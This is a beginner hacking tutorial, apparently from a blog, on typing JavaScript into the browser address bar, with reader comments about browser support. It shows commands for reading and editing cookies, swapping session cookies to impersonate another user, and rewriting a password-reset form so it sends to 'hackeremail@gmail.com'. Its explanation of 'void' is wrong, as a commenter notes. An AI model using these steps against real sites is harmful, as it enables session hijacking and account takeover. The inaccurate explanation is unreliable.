JavaScript is one of the main programming languages that the Web is built on. It talks directly to your browser and exchanges information with it in ways that HTML simply cannot. With JavaScript, you are able to access browser cookies, website preferences, real-time actions, slideshows, popup dialogs and calculators, or you create entire web-based apps. The list goes on nearly forever.
We can use JavaScript ourselves—right now—in the web browser. Go ahead, type this into the address bar of your browser without a URL in it and press the enter key:
javascript:alert('Hello World!');
You will see a popup box that says "Hello World!". This is what's called a JavaScript injection. We took a bit of JavaScript and manipulated the Web in real-time. JavaScript injections can be used to do a number of things; You can check cookie contents, swap cookies, temporarily edit a webpage, modify web forms, and even do some malicious stuff.
In this Null Byte I'm going to be teaching you the bare bones of JavaScript injections and how to manipulate cookies and web form data.
Step 1 Alert & Injection Chains
Let's start by using the example we used above and create a JavaScript alert.
javascript:alert('Hello World!');
Let's dissect that. "javascript" tells the browser we are using JavaScript, "alert" is calling the alert function and everything between "()" is the argument. In the argument, you see single quotes that indicate text strings. They can be interchanged with double quotes, just like in english, but they must be consistent. These rules are almost uniform when it comes to programming.
Let's chain commands. The semicolon is the indicator of command chains. Try this one out:
javascript:alert('Hello World!'); alert("Double quotes, and second alert");
Because JavaScript was already specified, we only need to call the alert function again.
Step 2 Cookie Alerts & Cookie Modification
Now we are going to check if the webpage we are on uses cookies. Then we will see if we can edit the cookies to swap login sessions.
javascript:alert(document.cookie)
If you see a popup with lots of jumbles of letters and things like "PHPSESSID=", that means the website is storing cookies on your computer.
Let's edit something in this cookie.
javascript:void(document.cookie="__mvtVariantID=tacos");
In the picture above, you see that I had the "__mvtVariantID=" element. I use the JavaScript injection to modify it to the word "tacos". You'll see the new element at the bottom in the picture below. This also uses the "void" function, which voids an element with whatever information you want to put over it.
Now if I were logged in and had another member's cookie, I could swap our sessions using these techniques, effectively becoming that member.
Step 3 Edit Web Forms
Sometimes you may want to edit a web form. A web form is when you have to "submit" something to a server, usually in logins or forgotten password forms. Let's say we have a forgot password form for some website, and this is the HTML code they used:
<form action="http://www.website.com/forgotpassword.php" method="post"> <input type="hidden" name="to" value="admin@website.com">
When using JavaScript to modify web forms, it labels them in numbers with the first web form being [0] and so on. For the example, this form will be [0]. Let's hack this form so it submits the user's password to us.
javascript:void(document.forms[0].to.value="hackeremail@gmail.com")
This is basically saying "Void the documents first form, skip (to) and go to the value (value) and make it equal to my email".
That's it, those are the basics of JavaScript injections! If you learn JavaScript from the ground up, which I hope you do, you can do some pretty awesome hacks with it. Take care, and come visit me and friends in IRC!
Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.
21 Comments
I can't seem to get the "Hello World!" message to work on my browsers. I tried copying and pasting the javascript alert (and typing it) into Firefox 7.0.1 on my Mac and nothing happened. No popup alert. I also tried it in Chrome 15.0.874.92 for Mac and it complete gets rid of the "javascript" portion and just performs a search instead. Does this only work in certain browsers?
I did it in Chrome. It works in all browsers, do you have NoScript already installed, or something blocking JavaScript? NoScript filters out URL JS as a safety measure against Social Engineering.
Nope, don't have NoScript installed. I don't know what else I would have that's blocking JavaScript. In the Firefox preferences, I have JavaScript enabled (if that means anything). And I don't see any odd add-ons. I did test it in Safari 5.1 and it works fine, so it must be something specific to those browsers. Any idea how I would find that out?
You cannot copy and paste these urls in Chrome. Chrome automatically removes the "javascript:" part of the links. MANUALLY type in EXACTLY this: javascript:alert("Hello World");
It looks like you typed in "javascript alert("Hello World")
That will NOT work. You NEED to start it off with "javascript:"
Sorry for the double post, I wanted to just point out that you have to put in a COLON after javascript. It might not be clear since it is tiny and easy to miss. That is why yours doesn't work
Yeah, I mean, I use Chromium in Linux, and when typing it out it worked. Never tried copying and pasting it, so yeah, that might be it :).
Maybe in about:config the booleans for JavaScript are offset? Have you played around in there before? Haha, that's weird that it doesn't work xD.
Should look like this
worked for me in firefox
javascript:alert('Hello World!');
In order for it to work, you need to have a space inbetween javascript: and alert
Restarting my MBP worked for Chrome 15.0.874.92, but I still can't get Firefox 7.0.1 to work, and I am typing it in directly. I tried Andrew's suggestion of adding a space after "javascript:", but that also didn't work.
I tried this all again on my iMac, and it also worked in Chrome 14.0.835.202, but it still won't work on Firefox (also 7.0.1). I know on my MBP, I have Firefox set up to automatically detect what I'm typing and take me directly there, so I thought that was the problem, but it's not like that on my iMac. Maybe it is just something in my about:config… I just don't know what.
That's so strange :/. At least you got to test it in another browser _
Yeah, it's pretty weird. Oh well, Chrome will do.
That was fun! I copied and pasted into IE8, works perfectly. For the chain command, when you move or delete the "Hello World" box, the "double quotes" box is behind it. Out of curiosity, how does one interpret the cookies box -- does the example show 4 cookies none of which are stored since no PHP?
The cookie example is just me visting this site, without being logged in. So they are just various cookies that the site uses. I couldn't use an example of an actual login cookie, because then someone could hijack my acount :(.
Also, besides "NoScript", what else could one do to protect against this type of hack.
Turning off JavaSCript is the only other option, sadly. If you do that, not many websites will work though xD.
Works on Chrome and IE (you have to write the "javascript:" part manually) ... Firefox 18.0.2 doesn't show any pop up window at all.
The void keyword is used to wrap code that might return something. If you execute a javascript:window.open(...) and the browser allowed it, you would see object Window appear in brackets in the browser. If you wrap in void(window.open(...)), the return value is ignored.
It has nothing to do with declaring something not valid
how can you change actions on a form?
is it by using javascript:void(documents.forms0.to.action);
??
Firefox disabled javascript in the URL bar, instead open a console using
ctrl + shift + K and then enter your command if you have developer tools in your firefox if you don't install the firebug addon
Can someone explain in this code javascript:void(document.forms0.to.value="hackeremail@gmail.com") what is the purpose of the word "to"?
Share Your Thoughts